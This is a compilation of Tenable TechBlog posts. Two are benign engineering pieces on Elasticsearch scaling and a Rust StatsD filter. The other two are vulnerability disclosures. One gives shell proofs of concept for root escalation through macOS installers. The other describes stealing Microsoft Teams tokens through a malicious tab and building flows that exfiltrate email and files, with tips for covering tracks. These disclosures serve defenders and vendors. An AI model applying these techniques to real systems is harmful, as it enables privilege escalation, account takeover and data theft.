Reading view

There are new articles available, click to refresh the page.

Scaling Tenable.io — From Site to Cell

Scaling Tenable.io — From Site to Cell

Since the inception of Tenable.io, keeping up with data pressure has been a continuous challenge. This data pressure comes from two dimensions: the growth of the customer base and the growth of usage from each customer. This challenge has been most notable in Elasticsearch, since it is one of the most important stages in our petabytes-scale SaaS pipeline.

When customers run vulnerability scans, the Nessus scanners upload the scan data to Tenable.io. There, the data is broken down into documents detailing vulnerability information, including data such as asset information and cyber exposure details. These documents are then aggregated into an Elasticsearch index. However, when the index reached the scale of hundreds of nodes per cluster, the team discovered that further horizontal scaling would affect overall stability. We would encounter more hot shard problems, leading to uneven load across the index and affecting the user experience. This post will detail the re-architecture that both solved this scaling problem and achieved massive performance improvements for our customers.

Incremental Scaling from Site to Cell

Tenable.io scales by sites, which a site handles requests for a group of customers.

Each point of presence, called a site, contains a multi-tenant Elasticsearch instance to be used by geographically similar customers. As data pressure increases, however, horizontal scaling will cause instability, which will in turn cause instability at the site level.

To overcome this challenge, our overall strategy was to break out the site-wide (monolith) Elasticsearch cluster into multiple smaller, more manageable clusters. We call these smaller clusters cells. The rule is simple: If a customer has over 100 million documents, they will be isolated into their own cell. Smaller customers will be moved to one of the general population (GP) clusters. We came up with a technique to achieve zero downtime migration with massive performance gains.

Migrate from site to cell, where customer with large dataset may get their own Elasticsearch cluster.

Request Routing and Backfill

To achieve a zero downtime migration, we implemented two key pieces of software:

  1. An Elasticsearch proxy that can:
  • Transparently proxy any Elasticsearch request to any Elasticsearch cluster
  • Intelligently tee any write request (e.g. Index, Bulk) to one or more clusters

2. A Spark job that can:

  • Query specific customer data
  • Using parallelized scrolls, read the Spark dataframes from the monolith cluster
  • Map the Spark dataframes from the monolith cluster directly to the cell-based cluster

To start, we reconfigured micro-services to communicate with Elasticsearch through the proxy. Based on the targeted customer (more on this later), the proxy performed dual write to the old monolith cluster and the new cell-based cluster. Once the dual write began, all new documents started flowing to the new cell cluster. For all older documents, we ran a Spark job to pull old data from the monolith cluster to the new cell cluster. Finally, after the Spark job completed, we cut all new queries over to the new cell cluster.

A zero downtime backfill process. Step 1: start dual write. Step 2: Backfill old data. Step 3: Cutover reads.

Elasticsearch Proxy

With the cell architecture, we see a future where migrating customers from one Elasticsearch cluster to another is a common event. Customers in a multi-tenant cluster can easily outgrow the cluster’s capacity over time and require migration to other clusters. In addition, we need to reindex the data from time to time to adjust immutable settings (e.g. shard count). With this in mind, we want to make sure this type of migration is completely transparent to all the micro services. This is why we built a proxy to encapsulate all customer routing logic such that all data allocation is completely transparent to client services.

Elasticsearch proxy encapsulate all customer routing logic from all other services.

For the proxy to be able to route requests to the correct Elasticsearch clusters, it needs the customer ID to be sent along with each request. To achieve this, we injected a X-CUSTOMER-ID HTTP header in each search and index request. The proxy inspected the X-CUSTOMER-ID header in each request, looked up the customer to cluster mapping, and forwarded the request on to the correct cluster.

While search and index requests always target a single customer, a bulk request contains a large number of documents for numerous customers. A single X-CUSTOMER-ID HTTP header would not provide sufficient routing information for the request. To overcome this, we found an interesting hack in Elasticsearch.

A bulk request body is encoded in a newline-delimited JSON (NDJSON) structure. Each action line is an operation to be performed on a document. This is an example directly copied from Elasticsearch documentation:

We found that within an action line, you can append any amount of metadata to the line as long as it is outside the action body. Elasticsearch seems to accept the request and ignore the extra content with no side effects (verified with ES2 to ES7). With this technique, we modified all clients of the Summary index to append customer IDs to every action.

With this modification, the proxy has enough information to break down a bulk request into subrequests for each customer.

Spark Backfill

To backfill old data after dual writes were enabled, we used AWS EMR with the elasticsearch-hadoop SDK to perform parallel scrolls against every shard from the source index. As Spark retrieves the data in the Resilient Distributed Dataset (RDD) format, the same RDD can be written directly to the destination index. Since we’re backfilling old data, we want to make sure we don’t overwrite anything that’s already been written. To accomplish this, we set es.write.operation to “create”. (Look for an upcoming blog post about how Tenable uses Kotlin with EMR and Spark!)

Here’s some high level sample code:

To optimize the backfill performance, we performed steps similar to the ones taken by Soundcloud. Specifically, we found the following settings the most impactful:

  • Setting the index replica to 0
  • Setting the refresh interval to 5 minutes

However, since we are migrating data using a live production system, our primary goal is to minimize performance impact. In the end, we settled on indexing 9000 documents per second as the sweet spot. At this rate, migrating a large customer takes 10–20 hours, which is fast enough for this effort.

Performance Improvement

Since we started this effort, we have noticed drastic performance improvement. Elasticsearch scroll speed saw up to 15X performance improvement, and queries decreased in latency of up to several orders of magnitude.

The chart below is a large scroll request that goes through millions of vulnerabilities. Prior to the cell migration, it could take over 24 hours to run the full scroll. The scroll from the monolith cluster suffers slow performance from the frequent resource contention with other customers, and it is further slowed by our fairness algorithm’s throttling. After the customer is migrated to the cell cluster, the same scroll request completes in just over 1.5 hours. Not only is this a large improvement for this customer, but other customers also reap the benefits of the decrease in contention.

In Summary

Our change in scaling strategy has resulted in large performance improvements for the Tenable.io platform. The new request routing layer and backfill process gave us new powerful tools to shard customer data. The resharding process is streamlined to an easy, safe and zero downtime operation.

Overall, the team is thrilled with the end result. It took a lot of ingenuity, dedication, and teamwork to execute a zero downtime migration of this scale.

tl;dr:

  • Exponential customer growth on the Tenable.io platform led to a huge increase in the data stored in a monolithic Elasticsearch cluster to the point where it was becoming a challenge to scale further with the existing architecture.
  • We broke down the site monolith cluster to cell clusters to improve performance.
  • We migrated customer data through a custom proxy and Spark job, all with zero downtime.
  • Scrolls performance improved by 15x, and queries latency reduced by several orders of magnitude.

Brought to you by the Sharders team:
Alan Ning, Alex Barbour, Ciaran Gaffney, Jagan Kondapalli, Johnny Mao, Shannon Prickett, Ted O’Meara, Tristan Burch

Special thanks to Jack Matheson and Vincent Gilcreest for all the help with editing.


Scaling Tenable.io — From Site to Cell was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

Optimizing 700 CPUs Away With Rust

In Tenable.io, we are heavy users of Datadog custom metrics. Millions of metrics are sent through Dogstatsd, providing deep insights into the complex platform. As the platform grew, we found that a significant number of metrics sent by legacy apps were obsolete. We tried to hunt down these obsoleted metrics in the codebase, but modifying legacy applications was extremely time consuming and risky.

To address this, we deployed a StatsD filter as a Datadog agent sidecar to filter out unnecessary metrics. The filter is a simple UDP datagram forwarder written in Node.js (sample, not actual code). We chose Node.js because in our environment, its network performance outstripped other languages that equalled its speed to production. We were able to implement, test and deploy this change across all of the T.io platform within a week.

statsd-filter-proxy is deployed as a sidecar to datadog-agent, filtering all StatsD traffic prior to DogstatsD.

While this worked for many months, performance issues began to crop up. As the platform continued to scale up, we were sending more and more metrics through the filter. During the first quarter of 2021, we added over 1.4 million new metrics as an effort to improve our observability. The filters needed more CPU resources to keep up with the new metrics. At this scale, even a minor inefficiency can lead to large wastage. Over time, we were consuming over 1000 CPUs and 400GB of memory on these filters. The overhead had become unacceptable.

We analyzed the performance metrics and decided to rewrite the filter in a more efficient language. We chose Rust for its high performance and safety characteristics. (See our other post on Rust evaluations) The source code of the new Rust-based filter is available here.

The Rust-based filter is much more efficient than the original implementation. With the ability to fully manage the heap allocations, Rust’s memory allocation for handling each datagram is kept to a minimum. This means that the Rust-based filter only needs a few MB of memory to operate. As a result, we saw a 75% reduction in CPU usage and a 95% reduction in memory usage in production.

Per pod, average CPU reduced from 800m to 200m core
Per pod, average memory reduced from 70MB to 5MB.

In addition to reclaiming compute resources, the latency per packet has also dropped by over 50%. While latency isn’t a key performance indicator for this application, it is rewarding to see that we are running twice as fast for a fraction of the resources.

With this small change, we were able to optimize away over 700 CPU and 300GB of memory. This was all implemented, tested and deployed in a single sprint (two weeks). Once the new filter was deployed, we were able to confirm the resource reduction in Datadog metrics.

CPU / Memory usage dropped drastically following the deployment

Source: https://github.com/tenable/statsd-filter-proxy-rs

TL;DR:

  • Replaced JS-based StatsD filter with Rust and received huge performance improvement.
  • At scale, even small optimization can result in a huge impact.

Optimizing 700 CPUs Away With Rust was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

More macOS Installer Flaws

Back in December, we wrote about attacking macOS installers. Over the last couple of months, as my team looked into other targets, we kept an eye on the installers of applications we were using and interacting with regularly. During our research, we noticed yet another of the aforementioned flaws in the Microsoft Teams installer and in the process of auditing it, discovered another generalized flaw with macOS package installers.

Frustrated by the prevalence of these issues, we decided to write them up and make separate reports to both Apple and Microsoft. We wrote to Apple to recommend implementing a fix similar to what they did for CVE-2020–9817 and explained the additional LPE mechanism discovered. We wrote to Microsoft to recommend a fix for the flaw in their installer.

Both companies have rejected these submissions and suggestions. Below you will find full explanations of these flaws as well as proofs-of-concept that can be integrated into your existing post-exploitation arsenals.

Attack Surface

To recap from the previous blog, macOS installers have a variety of convenience features that allow developers to customize the installation process for their applications. Most notable of these features are preinstall and postinstall scripts. These are scripts that run before and after the actual application files are copied to their final destination on a given system.

If the installer itself requires elevated privileges for any reason, such as setting up a system-level Launch Daemon for an auto-updater service, the installer will prompt the user for permission to elevate privileges to root. There is also the case of unattended installations automatically doing this, but we will not be covering that in this post.

The primary issue being discussed here occurs when these scripts — running as root — read from and write to locations that a normal, lower-privileged user has control over.

Issue 1: Usage of Insecure Directories During Elevated Installations

In July 2020, NCC Group posted their advisory for CVE-2020–9817. In this advisory, they discuss an issue where files extracted to Installer Sandbox directories retained the permissions of a lower-privileged user, even when the installer itself was running with root privileges. This means that any local attacker (local for code execution, not necessarily physical access) could modify these files and potentially escalate to root privileges during the installation process.

NCC Group conceded that these issues could be mitigated by individual developers, but chose to report the issue to Apple to suggest a more holistic solution. Apple appears to have agreed, provided a fix in HT211170, and assigned a CVE identifier.

Apple’s solution was simple: They modified files extracted to an installer sandbox to obtain the permissions of the user the installer is currently running as. This means that lower privileged users would not be able to modify these files during the installation process and influence actions performed by root.

Similar to the sandbox issue, as noted in our previous blog post, it isn’t uncommon for developers to use other less-secure directories during the installation process. The most common directories we’ve come across that fit this bill are /tmp and /Applications, which both have read/write access for standard users.

Let’s use Microsoft Teams as yet another example of this. During the installation process for Teams, the application contents are moved to /Applications as normal. The postinstall script creates a system-level Launch Daemon that points to the TeamsUpdaterDaemon application (/Applications/Microsoft Teams.app/Contents/TeamsUpdaterDaemon.xpc/Contents/MacOS/TeamsUpdaterDaemon), which will run with root permissions. The issue is that if a local attacker is able to create the /Applications/Microsoft Teams directory tree prior to installation, they can overwrite the TeamsUpdaterDaemon application with their own custom payload during the installation process, which will be run as a Launch Daemon, and thus give the attacker root permissions. This is possible because while the installation scripts do indeed change the write permissions on this file to root-only, creating this directory tree in advance thwarts this permission change because of the open nature of /Applications.

The following demonstrates a quick proof of concept:

# Prep Steps Before Installing
/tmp ❯❯❯ mkdir -p “/Applications/Microsoft Teams.app/Contents/TeamsUpdaterDaemon.xpc/Contents/MacOS/”
# Just before installing, have this running. Inelegant, but it works for demonstration purposes.
# Payload can be whatever. It won’t spawn a GUI, though, so a custom dropper or other application would be necessary.
/tmp ❯❯❯ while true; do
ln -f -F -s /tmp/payload “/Applications/Microsoft Teams.app/Contents/TeamsUpdaterDaemon.xpc/Contents/MacOS/TeamsUpdaterDaemon”;
done
# Run installer. Wait for the TeamUpdaterDaemon to be called.

The above creates a symlink to an arbitrary payload at the file path used in the postinstall script to create the Launch Daemon. During the installation process, this directory is owned by the lower-privileged user, meaning they can modify the files placed here for a short period of time before the installation scripts change the permissions to allow only root to modify them.

In our report to Microsoft, we recommended verifying the integrity of the TeamsUpdaterDaemon prior to creating the Launch Daemon entry or using the preinstall script to verify permissions on the /Applications/Microsoft Teams directory.

The Microsoft Teams vulnerability triage team has been met with criticism over their handling of vulnerability disclosures these last couple of years. We’d expected that their recent inclusion in Pwn2Own showcased vast improvements in this area, but unfortunately, their communications in this disclosure as well as other disclosures we’ve recently made regarding their products demonstrate that this is not the case.

Full thread: https://mobile.twitter.com/EyalItkin/status/1395278749805985792
Full thread: https://twitter.com/mattaustin/status/1200891624298954752
Full thread: https://twitter.com/MalwareTechBlog/status/1254752591931535360

In response to our disclosure report, Microsoft stated that this was a non-issue because /Applications requires root privileges to write to. We pointed out that this was not true and that if it was, it would mean the installation of any application would require elevated privileges, which is clearly not the case.

We received a response stating that they would review the information again. A few days later our ticket was closed with no reason or response given. After some prodding, the triage team finally stated that they were still unable to confirm that /Applications could be written to without root privileges. Microsoft has since stated that they have no plans to release any immediate fix for this issue.

Apple’s response was different. They stated that they did not consider this a security concern and that mitigations for this sort of issue were best left up to individual developers. While this is a totally valid response and we understand their position, we requested information regarding the difference in treatment from CVE-2020–9817. Apple did not provide a reason or explanation.

Issue 2: Bypassing Gatekeeper and Code Signing Requirements

During our research, we also discovered a way to bypass Gatekeeper and code signing requirements for package installers.

According to Gatekeeper documentation, packages downloaded from the internet or created from other possibly untrusted sources are supposed to have their signatures validated and a prompt is supposed to appear to authorize the opening of the installer. See the following quote for Apple’s explanation:

When a user downloads and opens an app, a plug-in, or an installer package from outside the App Store, Gatekeeper verifies that the software is from an identified developer, is notarized by Apple to be free of known malicious content, and hasn’t been altered. Gatekeeper also requests user approval before opening downloaded software for the first time to make sure the user hasn’t been tricked into running executable code they believed to simply be a data file.

In the case of downloading a package from the internet, we can observe that modifying the package will trigger an alert to the user upon opening it claiming that it has failed signature validation due to being modified or corrupted.

Failed signature validation for a modified package

If we duplicate the package and modify it, however, we can modify contained files at will and repackage it sans signature. Most users will not notice that the installer is no longer signed (the lock symbol in the upper right-hand corner of the installer dialog will be missing) since the remainder of the assets used in the installer will look as expected. This newly modified package will also run without being caught or validated by Gatekeeper (Note: The applications installed will still be checked by Gatekeeper when they are run post-installation. The issue presented here regards the scripts run by the installer.) and could allow malware or some other malicious actor to achieve privilege escalation to root. Additionally, this process can be completely automated by monitoring for .pkg downloads and abusing the fact that all .pkg files follow the same general format and structure.

The below instructions can be used to demonstrate this process using the Microsoft Teams installer. Please note that this issue is not specific to this installer/product and can be generalized and automated to work with any arbitrary installer.

To start, download the Microsoft Teams installation package here: https://www.microsoft.com/en-us/microsoft-teams/download-app#desktopAppDownloadregion

When downloaded, the binary should appear in the user’s Downloads folder (~/Downloads). Before running the installer, open a Terminal session and run the following commands:

# Rename the package
yes | mv ~/Downloads/Teams_osx.pkg ~/Downloads/old.pkg
# Extract package contents
pkgutil — expand ~/Downloads/old.pkg ~/Downloads/extract
# Modify the post installation script used by the installer
mv ~/Downloads/extract/Teams_osx_app.pkg/Scripts/postinstall ~/Downloads/extract/Teams_osx_app.pkg/Scripts/postinstall.bak
echo “#!/usr/bin/env sh\nid > ~/Downloads/exploit\n$(cat ~/Downloads/extract/Teams_osx_app.pkg/Scripts/postinstall.bak)” > ~/Downloads/extract/Teams_osx_app.pkg/Scripts/postinstall
rm -f ~/Downloads/extract/Teams_osx_app.pkg/Scripts/postinstall.bak
chmod +x ~/Downloads/extract/Teams_osx_app.pkg/Scripts/postinstall
# Repackage and rename the installer as expected
pkgutil -f --flatten ~/Downloads/extract ~/Downloads/Teams_osx.pkg

When a user runs this newly created package, it will operate exactly as expected from the perspective of the end-user. Post-installation, however, we can see that the postinstall script run during installation has created a new file at ~/Downloads/exploit that contains the output of the id command as run by the root user, demonstrating successful privilege escalation.

Demo of above proof of concept

When we reported the above to Apple, this was the response we received:

Based on the steps provided, it appears you are reporting Gatekeeper does not apply to a package created locally. This is expected behavior.

We confirmed that this is indeed what we were reporting and requested additional information based on the Gatekeeper documentation available:

Apple explained that their initial explanation was faulty, but maintained that Gatekeeper acted as expected in the provided scenario.

Essentially, they state that locally created packages are not checked for malicious content by Gatekeeper nor are they required to be signed. This means that even packages that require root privileges to run can be copied, modified, and recreated locally in order to bypass security mechanisms. This allows an attacker with local access to man-in-the-middle package downloads and escalates privileges to root when a package that does so is executed.

Conclusion and Mitigations

So, are these flaws actually a big deal? From a realistic risk standpoint, no, not really. This is just another tool in an already stuffed post-exploitation toolbox, though, it should be noted that similar installer-based attack vectors are actively being exploited, as is the case in recent SolarWinds news.

From a triage standpoint, however, this is absolutely a big deal for a couple of reasons:

  1. Apple has put so much effort over the last few iterations of macOS into baseline security measures that it seems counterproductive to their development goals to ignore basic issues such as these (especially issues they’ve already implemented similar fixes for).
  2. It demonstrates how much emphasis some vendors place on making issues go away rather than solving them.

We understand that vulnerability triage teams are absolutely bombarded with half-baked vulnerability reports, but becoming unresponsive during the disclosure response, overusing canned messaging, or simply giving incorrect reasons should not be the norm and highlights many of the frustrations researchers experience when interacting with these larger organizations.

We want to point out that we do not blame any single organization or individual here and acknowledge that there may be bigger things going on behind the scenes that we are not privy to. It’s also totally possible that our reports or explanations were hot garbage and our points were not clearly made. In either case, though, communications from the vendors should have been better about what information was needed to clarify the issues before they were simply discarded.

Circling back to the issues at hand, what can users do to protect themselves? It’s impractical for everyone to manually audit each and every installer they interact with. The occasional spot check with Suspicious Package, which shows all scripts executed when an installer package is run, never hurts. In general, though, paying attention to proper code signatures (look for the lock in the upper righthand corner of the installer) goes a long way.

For developers, pay special attention to the directories and files being used during the installation process when creating distribution packages. In general, it’s best practice to use an installer sandbox whenever possible. When that isn’t possible, verifying the integrity of files as well as enforcing proper permissions on the directories and files being operated on is enough to mitigate these issues.

Further details on these discoveries can be found in TRA-2021–19, TRA-2021–20, and TRA-2021–21.


More macOS Installer Flaws was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

Stealing tokens, emails, files and more in Microsoft Teams through malicious tabs

Trading up a small bug for a big impact

Intro

I recently came across an interesting bug in the Microsoft Power Apps service which, despite its simplicity, can be leveraged by an attacker to gain persistent read/write access to a victim user’s email, Teams chats, OneDrive, Sharepoint and a variety of other services by way of a malicious Microsoft Teams tab and Power Automate flows. The bug has since been fixed by Microsoft, but in this blog we’re going to see how it could have been exploited.

In the following sections, we’ll take a look at how we, as baduser(at)fakecorp.ca, a member of the fakecorp.ca organization, can create a malicious Teams tab and use it to eventually steal emails, Teams messages, and files from gooduser(at)fakecorp.ca, and send emails and messages on their behalf. While the attack we will look at has a lot of moving parts, it is fairly serious, as the compromise of business email is said to have cost victims $1.8 billion in 2020.

As an example to get us started, here is a quick clip of this method being used by Bad User to steal a Word document from Good User’s private OneDrive for Business.

Teams Tabs, Power Apps and Power Automate Flows

If you are already familiar with Teams and the Power Platform, feel free to skip this section, but otherwise, it may be useful to go over the pieces of the puzzle we’ll be using later.

Microsoft Teams has a default feature that allows a user to launch small applications as a tab in any team they are part of. If that user is part of an Office 365/Teams organization with a Business Basic license or above, they also have access to a set of Teams tabs which consist of Microsoft Power Apps applications.

A Teams tab with the Bulletins Power App

Power Apps are part of the wider Microsoft Power Platform, and when a user of a particular team launches their first Power App tab, it creates what Microsoft calls a “Dataverse for Teams Environment”, which according to Microsoft “is used to store, manage, and share team-specific data, apps, and flows”.

It should also be noted that, apart from the team-specific environments, there is a default environment for the organization as a whole. This is important because users can only create connectors and flows in either the default environment, or for teams which they own, and the attack we’re going to look at requires the ability to create Power Automate flows.

Power Automate is a service which lets users create automated workflows which can operate on their Office 365 organization’s data. For example, these flows can be used to do things like send emails on a particular schedule, or send Microsoft Teams messages any time a file on Sharepoint is updated.

Power Automate flow templates

The bug: trusting a bad domain

When a Power App tab is first created for a team, it runs through a deployment process that uses information gathered from the make.powerapps.com domain to install the application to the team dataverse/environment.

Installing the app

Teams tabs generally operate by opening an iframe to a page on a domain which is specified as trusted in that application’s manifest. What we see in the above image is a tab that contains an iframe to the page apps.powerapps.com/teams/makerportal?makerPortalUrl=https://make.powerapps.com/somePageHere, which itself is opening an iframe to the make.powerapps.com page passed in makerPortalUrl.

Immediately upon seeing this I was curious if I could make the apps.powerapps.com page load our own content. I noticed a couple of things:

  1. The apps.powerapps.com page will only load the iframe to makerPortalUrl if it is in a Microsoft Teams tab (it uses the Microsoft Teams javascript client sdk).
  2. The child iframe would only load if the makerPortalUrl begins with https://make.powerapps.com

We can see this happen if we view the page’s source, testing out different parameters. Trying to load any url which doesn’t begin with https://make.powerapps.com results in the makerPortalUrl being set to an empty string. However, the validation stops at checking whether the domain begins with make.powerapps.com, and does not check whether it is the full domain.

So, if we set makerPortalUrl equal to something like https://make.powerapps.com.fakecorp.ca/ we will be able to load our own content in the iframe!

Cool, we can load an iframe with our own content two iframes deep in a Teams tab, but what does that get us? Microsoft Teams already has a website tab type which lets you load an iframe with a URL of your choosing, and with those you can’t do much. Fortunately for us, some tabs have more capabilities than others.

Stealing auth tokens with postMessage

We can load our own content in an iframe, which itself is sitting in an iframe on apps.powerapps.com. The reason this is more interesting than something like the Website tab type on Teams is that for Power App extension tab types, the app.powerapps.com page communicates both with Teams, by way of the Teams JS SDK, as well as its child iframe using javascript postMessage.

We can communicate with the parent window via postMessage

Using a Chrome extension, we can watch the postMessages passed between windows as an application is installed and launched. At first glance, the most interesting message is a postMessage from make.powerapps.com in the innermost window (the window which we are replacing when specifying our own makerPortalUrl) to the apps.powerapps.com window, with GET_ACCESS_TOKEN in the data.

The frame which we were replacing was getting access tokens from its parent window without passing any sort of authentication.

the child iframe requesting an access token via postMessage

I tested this same kind of postMessage from the make.powerapps.com.fakecorp.ca subdomain, and sure enough, I was able to grab the same access tokens. A handler is registered in the WebPlayer.EmbedMakerPortal.js file loaded by apps.powerapps.com which fetches tokens for the requested resource using the https://apps.powerapps.com/auth/onbehalfof endpoint, which in our testing is capable of grabbing tokens for:

- apihub.azure.com
- graph.microsoft.com
- dynamics apps subdomains
- service.flow.microsoft.com
- service.powerapps.com
Grabbing the access token from a page we control

This is a super exciting thing to see: A tab under our control which can be created in a public team can retrieve access tokens on behalf of the user viewing it. Let’s slow down for a moment though, because I forgot to show an important step: how did we get our own content in a tab in the first place?

Overwriting a Teams tab

I mentioned earlier that Teams tabs generally operate by opening an iframe to a page which is specified in the tab application’s manifest. The request to define what page is loaded by a tab can be seen when adding a new tab or even renaming a currently existing tab.

The PUT request for renaming a tab lets us change the tab url

The url being given in this PUT request is pointing to the Bulletins Power App which is installed in our team environment. To point the tab to our malicious content we simply have to replace that url with our apps.powerapps.com/teams/makerportal?makerPortalUrl=https://make.powerapps.com.fakecorp.ca page.

It should be noted that this only works because we are passing a url with a trusted domain (apps.powerapps.com) according to the application’s manifest. If we try to pass malicious content directly as the tab’s url, the tab will not load our content.

A short and inconspicuous proof of concept

While the attacks we will look at later are longer and overly noisy for demonstration purposes, let’s consider a very quick proof of concept of how we could use what we currently have to steal access tokens from unsuspecting users.

If we host a page similar to the following and overwrite a tab to point to it, we can grab users’ service.flow.microsoft.com token and send it to another listener we control, while also loading the original Power App in an iframe that matches the tab size. While it won’t look exactly like a normally-running Power App tab, it doesn’t look different enough to notice. If the application requires postMessage communication with the parent app, we could even act as a man-in-the-middle for the postMessages being sent and received by adding a message handler to the PoC.

During the loading you can see two spinning circles. The smaller one is our JS running.

Now that we know we can steal certain tokens, let’s see what we can do with them, specifically the service.flow.microsoft.com token we just stole.

Stealing more tokens, emails, messages and files

The reason we’re focused on the service.flow.microsoft.com token is because it can be used to get us access to more tokens, and to create Power Automate flows, which will allow us to access a user’s email from Outlook, Teams messages, files from OneDrive and SharePoint, and a whole lot more.

We will construct the attack, at a high level, by:

- Grabbing an extra set of tokens from api.flow.microsoft.com
- Creating connectors to the services we want to access.
- Consent on behalf of the victim user using first party logins
- Creating Power Automate flows on the victim user’s behalf which let us send/receive emails and teams messages, retrieve emails, messages and files.
- Adding ourselves (or a group we’re in) to the owners of the flow.
- Having the victim user send an email to us containing any information we need to access the flows.

For our example we’re going to be showing pieces of a proof of concept which creates:

- Office 365 (for outlook access), and Teams connectors
- A flow which lets us send emails as the user
- A flow which lets us get all Teams messages from channels the victim is in, and send messages on their behalf.

The api.flow.microsoft.com token bundle

The first stop on our quest to get access to everything the victim user holds dear is an api endpoint which will let us generate a handful of new access tokens. Sending an empty POST request to api.flow.microsoft.com/providers/Microsoft.ProcessSimple/environments/<environment>/users/me/onBehalfOfTokenBundle?api-version=2021–01–03 will let us grab the following tokens, with the following scopes:

the api.flow.microsoft.com token bundle
- graph.microsoft.com
- scope : Contacts.Read Contacts.Read.Shared Group.Read.All TeamsAppInstallation.ReadWriteForTeam TeamsAppInstallation.ReadWriteSelfForChat User.Read User.ReadBasic.All
- graph.microsoft.net
- scope : user_impersonation
- appservice.azure.com
- scope : user_impersonation
- apihub.azure.com
- scope : user_impersonation
- consent.msp.windows.net/logic-app-aad
- scope : user_impersonation
- service.powerapps.com
- scope : user_impersonation

Some of these tokens will become useful to us for constructing a larger attack (specifically the graph.microsoft.com and apihub.azure.com tokens).

Creating connectors and using first party logins

To create flows which let us take control of the victim’s services, we first need to create connectors for those services.

When a connector is created, a user can use a consent link to login via a login.microsoft.com popup and grant permissions for the service for which the connector is being made (like Office 365, Teams, or Sharepoint). Some connectors, however, come with a first party login url, which lets us bypass the regular interactive login process and authorize the connector using only the authorization tokens already gathered.

Creating a connector on the victim’s behalf takes only three requests, the final of which is a POST request to the first party login url, with the apihub.azure.com access token.

consenting to a connector with a stolen apihub.azure.com token

After this third request, the connector will be ready to use with any flow we create.

Creating a flow

Given the number of potential connector types, flow triggers, and actions we can perform, there are an endless number of ways that we could leverage this access. They range anywhere from simply forwarding every email which is received by the victim to the attacker, to only performing actions if a particular RSS feed updates, to creating REST endpoints that let us trigger any number of different actions in different services.

Additionally, if the organization happens to have premium Power Apps/Automate licensing, there are many more options available. It is honestly a very useful system (even if you’re not trying to exploit a whole Office 365 org).

For our attack, we will look at creating a flow which gives us access to endpoints which take JSON input, and perform the actions we want (send emails, teams messages, downloads files, etc). It is a noisier method, since it requires the attacker to send requests (authenticated as themselves), but it is convenient for demonstration. Not all flows require the attacker to be authenticated, or require user interaction.

Choosing flow triggers

A flow trigger is how a flow will be kicked off / knows when to begin. The three main types are automatic (when an email comes in, forward it to this address), instant (when a request is received at this endpoint, trigger the flow), and scheduled (run the flow every xyz seconds/minutes/hours).

The flow trigger we would prefer to use is the “when an HTTP request is received” trigger, which lets unauthenticated users trigger the flow, but that is a premium feature, so instead we will use the “Manually Trigger a Flow” trigger.

The trigger for our Microsoft Teams flow

This trigger requires authentication, but because it is assumed that the attacker is part of the organization this shouldn’t be a problem, and there are ways to limit information about who is running what flows.

Creating the flow logic

Flows allow you to create an automated process piece by piece, passing the outputs of one action to the next. For example, in the flow we created to let us get all Teams messages from a user, as well as send messages to any channel on their behalf, we determine what action to take, who to send the message to and other details depending on the input passed to the trigger.

Sending a message is quick and simple, but to retrieve all messages for all teams and channels, we first grab a list of all teams, then get each channel per team, then all messages per channel, and roll it up into one big gross ball and have the flow send it to the attacker via email.

The Teams flow for our PoC

Now that we have the flow created, we need to know how we can create it, and share it with ourselves as the attacker, using the tokens we’ve stolen and what those requests look like. Luckily in our case, it is just a couple of simple requests.

  1. A POST request, containing JSON object representing the flow, to create it and get the unique flow name.
  2. A GET request to grab the flow trigger uri, which will let us trigger the flow as the attacker once we have added ourselves to the owners group.

Adding a group to flow owners

For the trigger we chose, we need to be able to access the flow trigger uri, which can only be done by users who have access to the flow. As a result, we need to add a group we belong to (which seems less suspicious than just adding ourselves) to the flow owners.

The easiest choice here is some large, all-encompassing group, but in our case we’re using the group which is generated automatically for any team created in Microsoft Teams.

In order to grab the unique group id, we use the graph.microsoft.com token we stole from the victim earlier. We then modify the flow’s owners to include that group.

adding a group to the flow owners

Running the flow and sending ourselves the uris we need

In the proof of concept we’re building, we create a flow that lets us send emails on behalf of the victim user. This can be leveraged at the end of the attack to send ourselves the list of the flow trigger uris we need in order to perform the actions we want.

sending an email using the Outlook connector and flow we’ve created

For example, at the end of the email/Teams proof of concept we’re building, an email is sent on the victim’s behalf which sends us the flow trigger uris for both the Outlook and Teams flows we’ve created.

The message we receive from the victim with the flow trigger uris

Using these flow trigger uris, we can now read the victim’s emails and Teams messages, and send messages and emails on their behalf (despite being authenticated as Bad User).

Putting it all together

The “TL;DR” shot: actions the malicious tab performs on opening

There are a number of ways in which we could build an attack with this vulnerability. It is likely that the best way would be to only use javascript on the malicious tab to steal the service.flow.microsoft.com token, and then perform the rest of the actions from an attacker-controlled server, so we reduce the traffic being generated by the victims and aren’t cut off by them navigating away from the tab.

For our quick and dirty PoC however, we just perform the whole attack with one big javascript section in our malicious tab. The pseudocode for our attack looks like this:

Setting up a malicious tab with a payload like the one above will cause the victim to create connectors and flows, and add the attacker as an owner to them, as well as send them an email containing the flow trigger uris.

As a real example, here is a quick clip of a similar payload running and sending the attacker the victim’s Teams messages, and letting the attacker send a message to a private team masquerading as the victim.

stealing and sending Teams messages

Considerations for the attacker

If you’ve gone through the above and thought “cool, but it would be really easy for an admin to determine who is using these flows maliciously,” you’d be correct. However, there are a number of steps one could take to limit the exposure of the attacking user if a similar attack is being carried out in a penetration test.

  • Flows allow you to specify whether the inputs and outputs to each action should be kept secret / scrubbed from the flow’s run history. This means that it would be harder to observe what data is being taken, and where it is being sent.
  • Not all flows require the user to make authenticated requests to trigger. Low and slow methods like having flows trigger on a RSS feed update (30 minute minimum period), or on a schedule, or automatically (like when a new email comes in from any account, read the email body and perform those actions).
  • Running the attack as one long javascript payload isn’t ideal and takes too long in real situations. Just grabbing the service.flow.microsoft.com token and conducting the rest of the attack from an attacker-controlled machine would be much less conspicuous.
  • Flows can be used to creatively cover an attacker’s tracks. For example, if you exfiltrate data via email in a flow, you can add a final step which deletes any emails sent to the attacker’s mail from the Sent Items folder.

Considerations for org administrators

While it may be difficult to determine who in a team has set up a malicious tab, or what user is running the flows (if the inputs/outputs have been made secret), there is a potential indicator to identify whether a user has had malicious flows run on their behalf.

When a user logs into make.powerapps.com or flow.microsoft.com to create a flow, a Microsoft Power Automate free license is automatically added to their set of licenses (if they didn’t already have one assigned to them). However, when flows are created on a user’s behalf by a malicious tab, they don’t have the license assigned to them. This license status can be cross referenced with which users have flows created under their name at admin.powerplatform.microsoft.com

organization admin portal

